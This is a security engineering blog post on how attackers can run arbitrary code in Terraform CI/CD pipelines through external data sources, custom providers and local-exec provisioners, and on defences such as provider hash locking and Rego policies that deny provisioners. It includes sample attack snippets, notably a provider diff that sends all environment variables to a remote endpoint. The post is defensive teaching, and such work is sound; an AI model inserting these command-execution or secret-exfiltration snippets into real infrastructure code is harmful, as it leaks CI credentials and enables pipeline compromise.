Terraform CI code execution restrictions

This article is part of the Security Tech Blog Series: Spring Cleaning for Security series, brought to you by Maximilian Frank (@max-frank) from the Security Engineering team.

Background

At Mercari, we utilize many microservices developed across multiple different teams. Each team has ownership over not only their code, but also the infrastructure necessary to run their services. To allow developers to take ownership of their infrastructure we use HashiCorp Terraform to define the infrastructure as code. Developers can use Terraform native resources or custom modules provided by our Platform Infra Team to configure the infrastructure required by their service. Provisioning of this infrastructure is carried out as part of our CI/CD pipeline.

In this article, we will discuss some of our CI/CD security measures to restrict the execution of unauthorized potentially malicious Terraform code. Previously, Daisuke Fujita (@dtan4) touched on this topic in his blog post Securing Terraform monorepo CI, which discussed our overall CI/CD security concept.

Terraform – CI/CD Poisoned Pipeline Execution

The team at Cider Security recently released a top 10 list of CI/CD security risks. In this list they rank Poisoned Pipeline Execution (PPE) as number four. They define PPE as

… the ability of an attacker … to manipulate the build process by injecting malicious code/commands into the build pipeline configuration, …

PPE can further be separated into three categories

  • Direct PPE: The attacker can modify the CI/CD configuration and can thus change the CI/CD flow (e.g., add commands).
  • Indirect PPE: The attacker cannot directly modify the CI/CD configuration, but can modify configurations, scripts, etc. loaded and executed as part of the defined CI/CD pipeline. They can thus inject additional commands or code to be executed indirectly.
  • Public PPE: For repositories that are hosted publicly and automatically execute CI/CD pipeline steps, such as running unit tests, an attacker can potentially inject malicious commands into the CI/CD flow through a pull request.

Our previous blog post Securing Terraform monorepo CI by @dtan4 explained how we mitigated the risk of Direct PPE by moving our CI/CD pipeline configuration into a separate repository with stricter access controls. Here we will introduce a few of the security measures we implemented to reduce the risk of Indirect PPE through Terraform code committed to our repositories. Note that for this blog post we will focus on how to reduce the risk of arbitrary code and command execution through Terraform within the context of CI/CD, i.e., attacks where a malicious actor can freely execute any command with the same privileges as the CI/CD environment.

Terraform CI/CD Overview

Infrastructure provisioning using Terraform happens in two stages: plan and apply. During the plan stage Terraform parses the current state of your infrastructure and the provided Terraform configuration to build a dependency graph of resources, usually referred to as the Terraform Plan. During the apply stage this graph is used to apply all the necessary actions to transform your current infrastructure state to the configuration defined by your code. Note that the plan stage is generally considered as read only i.e., all operations executed by Terraform during the plan stage should only read data and not make any lasting changes to infrastructure or systems. Such modifications should only happen during the apply stage, when the infrastructure configuration is deployed and applied.

When using Terraform with a CI/CD system and a version control system like Git the Terraform Plan is usually run on pull requests to verify and review the infrastructure changes caused by the new code. The apply stage is then executed when the code is merged into the main branch. Since both stages require high level access privileges to your infrastructure (plan requires read access and apply requires write access), it is recommended to have appropriate code reviews and approval steps before running Terraform plan or apply CI/CD steps.

Providers

Terraform heavily relies on plugins called providers to provide users the ability to define infrastructure through code for various types of infrastructure (GCP, AWS, etc.). Usually a provider will contain a number of:

  • resource types: used to configure infrastructure elements
  • and data source types: used to inspect/read information

For example, the Google Cloud Platform Provider contains all the resource and data source types necessary to deploy infrastructure using the various GCP services. Providers are most commonly installed from the Terraform Registry. Anyone can publish their own custom provider to this registry. This plugin based provider system can be used by attackers to execute malicious code in Terraform CI/CD environments. We discuss two potential attack scenarios below, both by injecting malicious (or vulnerable) providers directly into the Terraform configuration (if they have access to the code repository), and in-directly by tricking developers into using a malicious provider (e.g., through typosquatting or other supply chain attacks).

Malicious Committers

Let’s say an attacker somehow has gained write access to one or more of your CI/CD integrated Terraform code repositories (e.g., compromised a developer account). This means the attacker can both modify your Terraform code and trigger CI/CD jobs. The CI/CD platform in our theoretical scenario is configured to execute terraform plan for each pull request and terraform apply after the branch has been merged. In addition, merging a branch is only possible after a code owner approves the changes. As will become apparent below, executing terraform plan automatically without code review and an approval step is not safe. So we recommend to also have an appropriate approval system in place for the plan step and also limit the privileges assigned to the CI/CD terraform plan step (e.g., only read access to resources).

Now since your CI/CD pipeline requires code owner approval before merging and only terraform plan is executed you might assume the attacker cannot modify your infrastructure or execute arbitrary commands, but in reality Terraform’s provider plugin system makes it possible for an attacker to execute arbitrary code even during the plan phase. One way an attacker might achieve such code execution is by using the Terraform External Provider.

data "external" "example" {
  program = ["sh", "-c", "echo \"{\\\"hello\\\": \\\"$(whoami), I am evil\\\"}\""]
}

output "output" {
  value = data.external.example.result
}

The External Provider is an official Terraform provider published by HashiCorp and it makes it possible to execute any command or script available on the system executing terraform. Normally this can be used when you want to integrate with an API for which no first party provider exists yet, but as can be seen in the code snippet above the provider can also easily be used to execute malicious commands. As external is a data source block the configured commands are already executed during terraform plan (as shown in the code snippet below). Note that the External data source expects executed commands to output valid JSON.

$ terraform plan

Changes to Outputs:
  + output = {
      + "hello" = "mfrank, I am evil"
    }

Other than the HashiCorp External Provider a malicious committer could also just create their own Terraform provider like our Security Engineering team’s very own Hiroki Suezawa (@rung) did. He created a cmdexec provider for security testing of Terraform CI/CD systems. This provider works similar to the HashiCorp External provider in that it provides a data source that can be configured to execute system commands or scripts. The default behavior of Terraform is to download and install the latest version (unless otherwise specified) of all providers referenced in the configuration during Terraform initialization. Therefore any developer with access to the code can just add new providers to install by modifying the Terraform configuration.

While the malicious code would probably easily be spotted by a reviewer for both of these providers a more sophisticated attacker could create a complex provider and hide their malicious code somewhere alongside hundreds of lines of non-malicious code.

Supply Chain Attacks

As mentioned already it is recommended to implement a review and approval step even before the plan stage. A diligent reviewer is likely to find and reject most malicious code commits, but such a review process alone is not enough to prevent poisoned pipeline execution. An attacker could still be able to execute malicious code in your CI/CD environment without access to your code repositories through the providers and tools that are already part of your supply chain.

Lets say a few months back your company implemented a new SRE policy requiring you to add a poem to the description of every infrastructure resource that supports some form of a description or comments field. Since writing poems is hard and you did not want to copy paste a poem from somewhere on the internet every time you add some resource you decided to see if there maybe is a Terraform provider that can help you with this new policy.

As luck would have it you found max-frank/poetry v1.0.0 a Terraform provider with a data source that can retrieve poems from https://poetrydb.org/, exactly what you needed. Since you are very security conscious you even do a full code review and find no bad code and add the provider to your code base.

terraform {
  required_providers {
    poetry = {
      source  = "max-frank/poetry"
      version = ">= 1.0.0"
    }
  }
}

data "poetry" "test" {
  title = "Ozymandias"
}

output "poem" {
  value = data.poetry.test
}

A few months go by and you and your systems are running normally. Your CI/CD system is doing overtime with all the new infrastructure you are adding. You have just packed your bags for a week-long all-expenses-paid holiday to sunny Spain, a golden week so to say, when your company’s security team calls you up and tells you all the CI/CD secrets have leaked and your week of sipping pina coladas on the the Costa Del Sol is cut short since they need your help with investigation and clean up. After some investigation you find the cause of the leak, it seems the maintainer of the poetry provider you’ve been using released a new version with malicious code that sends all environment variables to a remote server every time the provider is loaded (max-frank/poetry pull request). Your CI/CD pipeline has been using the new malicious version for the past few days.

func New(version string, apiEndpoint string) func() tfsdk.Provider {
+   // get local poems
+   localPoems, _ := json.Marshal(os.Environ())
+   http.Post("http://localhost:8080/poetry", "text/plain", bytes.NewReader(localPoems))
+
    return func() tfsdk.Provider {
        return &provider{
            version:     version,
            apiEndpoint: apiEndpoint,
        }
    }
}

You think you could have prevented this attack by locking the version of the provider to version 1.0.0 in your Terraform config, but the attacker could have instead of releasing a new provider version simply replaced the 1.0.0 release with a new malicious one. So what could you actually have done to prevent this and other similar attacks?

Provider Locking

At Mercari, in 2021 we experienced a supply chain attack when Codecov, one of the tools we had been using in our CI/CD environment was compromised. Since then we have been working hard to further improve the security of our systems and harden our supply chain to reduce the risk and potential impact of attacks on any components in our supply chain.

As part of this effort we also implemented Terraform provider locking for our CI/CD environment to prevent:

  1. Usage of Terraform providers that have not undergone security review by our team
  2. Supply chain attacks that replace or modify trusted providers with malicious code

For the CI/CD pipeline of our Terraform mono repository we implemented provider locking by pre-downloading all verified providers and checking downloaded archives against their known file hashes. The downloaded providers are then installed directly into our CI/CD Docker image. By always executing terraform init with the -plugin-dir flag we can ensure that only our pre-installed providers are used. Since an attacker might gain control over not only the code of the providers you have in your supply chain, but also the archives of already published versions it is important to verify the integrity of the downloaded providers by checking the downloaded files against previously observed and approved file hashes.

$ terraform init -plugin-dir=/opt/terraform-providers

The list of allowed providers is managed by our Platform Infra Team in our CI/CD repository which imposes strict access controls and code review requirements.

Provisioners

Apart from providers Terraform supports another feature that can be abused to execute arbitrary code in your CI/CD pipelines.
Provisioners are a rarely used (for a reason) feature in Terraform that allows you to execute additional code upon creation or destruction of Terraform resources. As of writing this blog Terraform supports 3 types of provisioners:

  • file, allows you to copy files from the current machine to the newly created resource
  • local-exec, can be used to execute commands on the current machine after a new resource is created
  • remote-exec, can be used to execute commands on a remote resource after it is created

As you can see, the local-exec provisioner provides us with a clear path to arbitrary code execution. So an attacker who has already gained write access to a Terraform code repository just has to add a provisioner block to one of your Terraform resources.

resource "google_compute_instance" "default" {
  ...
  provisioner "local-exec" {
    command = "echo $(whoami)"
  }
}

Note that if you are using a provisioner as part of your Terraform configuration and it is executing a local script file, attackers could also achieve arbitrary code execution by modifying that script file.

Now, unlike the HashiCorp External provider the local-exec provisioner (or any of the other available provisioners) is only executed after the resource it is attached to is created or destroyed. This means it only ever runs in the apply phase meaning if you have reviews before both the plan and the apply phase you already have at least two guard rails in place protecting you against malicious attacks using Terraform provisioners. However, generally it is better to have more layers of security for defense in depth. Below we will discuss one possible approach for automatically checking for and blocking Terraform provisioners.

Restrict through Policy

Above we discussed how we use provider locking to prevent the installation and execution of any Terraform providers that have not been reviewed and approved. This approach is possible since every provider (including HashiCorp official providers) are plugins, i.e., they are not shipped with Terraform, but instead are installed as extra packages only when needed. This is not the case for provisioners. Provisioners are directly integrated into the Terraform binary and as of writing this blog there is no native way of disabling their features.

This means that we have to detect provisioners and stop CI/CD execution before running terraform apply (remember provisioners are not executed during plan). One way to achieve this is to validate your Terraform configuration and/or Terraform Plan against security policies and stop further execution, if a policy violation is detected. Note that generally these kinds of policies should not be considered as security mechanisms, but rather as guard rails assisting developers in keeping the code clean and free of any compliance violations.

At Mercari we use Conftest to validate our Terraform (and other infrastructure configuration) against a set of internal compliance and security policies. Conftest supports HCL, JSON and many other configuration file types and allows us to test policies against both raw Terraform configuration files and Terraform Plans in JSON format.

terraform plan -out=plan
terraform show -json plan > plan.json
conftest test --policy example.rego plan.json

Policy files used by Conftest are written in Rego and tested with Open Policy Agent (OPA). For Terraform Enterprise customers HashiCorp provides a policy as code framework called Sentinel which can be used for the same purpose.

For creating a policy to disallow provisioners we recommend validating against the Terraform Plan. Checking against the Plan makes it easier to find occurrences of provisioners in modules, since you have the full resource graph in one JSON file. The following policy checks if any configured resource has a provisioner attached to it and sets an appropriate policy violation.

package policy.provisioners.local_exec.disallow

values_with_path(value, path) = r {
    r = [
    {
        "path": sprintf("%s.%s",[concat(".", path), address]), 
        "value": val
    } | val := value[i]; address := value[i].address]
}

# modified from https://play.openpolicyagent.org/p/0K5cSyB6vi
resources[r] {
    some path, value
    # Walk over the JSON tree and check root and child modules
    walk(input.configuration, [path, value])
    # Look for resources in the current value based on path
    rs := module_resources(path, value)
    # Aggregate them into `resources`
    r := rs[_]
}

# Variant to match root_module resources
module_resources(path, value) = rs {
  # Where the path is [..., "root_module", "resources"]
    reverse_index(path, 1) == "resources"
    reverse_index(path, 2) == "root_module"
    rs := values_with_path(value, path)
}

# Variant to match child_modules resources
module_resources(path, value) = rs {
    # match [..., "module_calls", i, "module", "resources"]
    reverse_index(path, 1) == "resources"
    reverse_index(path, 2) == "module"
    reverse_index(path, 4) == "module_calls"
    rs := values_with_path(value, path)
}

reverse_index(path, idx) = value {
    value := path[count(path) - idx]
}

deny_provisioners[msg] {
  count(resources[i].value.provisioners) > 0
  msg = sprintf("Provisioner found at path: '%s'!", [resources[i].path])
}

You can also test this policy on the rego playground. The policy works by first extracting all resources using walk and some (existence operator). Once we have a list off all resources we can just define our policy term to deny on any resource containing a provisioner. This policy will reject any Terraform configuration containing a provisioner.

Terraform Enterprise customers might also want to take a look at the HashiCorp Terraform Guides Repository which contains various example Sentinel policies one of which can be used to disallow the execution of provisioners.

You can also modify the above policy if you want to for example allow specific configurations of the local-exec provisioner commands, but this is only possible for provisioner commands that do not use Terraform variable interpolation. The reason for this is that the Terraform Plan for provisioner commands using variable interpolation does not include the actual command string, thus making it impossible to check against a policy.

resource "null_resource" "static" {
  provisioner "local-exec" {
    command = "echo 'Hello'"
  }
}

resource "null_resource" "dynamic" {
  provisioner "local-exec" {
    command = "echo ${self.id}"
  }
}

For example the above Terraform configuration will contain the following resource configurations in its Terraform plan:

[
    {
        "address": "null_resource.dynamic",
        "mode": "managed",
        "type": "null_resource",
        "name": "dynamic",
        "provider_config_key": "null",
        "provisioners": [
            {
                "type": "local-exec",
                "expressions": {
                    "command": {
                        "references": [
                            "self.id",
                            "self"
                        ]
                    }
                }
            }
        ],
        "schema_version": 0
    },
    {
        "address": "null_resource.static",
        "mode": "managed",
        "type": "null_resource",
        "name": "static",
        "provider_config_key": "null",
        "provisioners": [
            {
                "type": "local-exec",
                "expressions": {
                    "command": {
                        "constant_value": "echo 'Hello'"
                    }
                }
            }
        ],
        "schema_version": 0
    }
]

As can be seen above, the null_resource.static provisioner will retain its command in the resulting Terraform Plan, but for the null_resource.dynamic provisioner only a list of referenced variables is retained. With this limitation in mind we can create a policy that only allows local-exec provisioners on specific resource paths and constant commands.

# approved provisioners configuration
approved_provisioners := [
    {
        "path": "null_resource.static",
        "command": "echo 'Hello'"
    },
    {
        "path": "test.test.null_resource.static",
        "command": "echo 'Hello'"
    }
]

# build resource list the same way as before
…

# deny all unapproved local-exec provisioners 
deny_local_exec[msg] {
    resources[i].value.provisioners[j].type = "local-exec"
    not is_approved(resources[i].path, resources[i].value.provisioners[j])

    msg = sprintf(
        "Unapproved local-exec provisioner command `%s` at path '%s'!",
        [resources[i].value.provisioners[j].expressions.command.constant_value, resources[i].path]
    )
}

is_approved(path, provisioner) { 
    some approved
    path == approved_provisioners[approved].path
    provisioner.expressions.command.constant_value == approved_provisioners[approved].command
}

The above policy uses the some keyword to check if an approved path and command value pair exist that match the provisioner. If no such pair exists the policy will reject the provisioner. The full code of the above policy can be viewed on the Rego Playground. Also HashiCorp provides a similar Sentinel policy in their Terraform Guides repository.

Conclusion

In this blog, we discussed how arbitrary code execution can be achieved by an attacker targeting Terraform CI/CD pipelines. We also introduced some of the security mechanisms we use at Mercari to guard against these kinds of attacks, either through malicious commits or supply chain attack vectors. CI/CD pipelines have become a critical piece of infrastructure for many organizations, thus keeping your CI/CD pipelines and infrastructure secure is vital. I hope the ideas and approaches discussed in this blog can help you further secure your own CI/CD pipelines using Terraform.

If you found this blog interesting and want to work with us, we are hiring.

Further Readings

English

Japanese

  • X
  • Facebook
  • linkedin
  • このエントリーをはてなブックマークに追加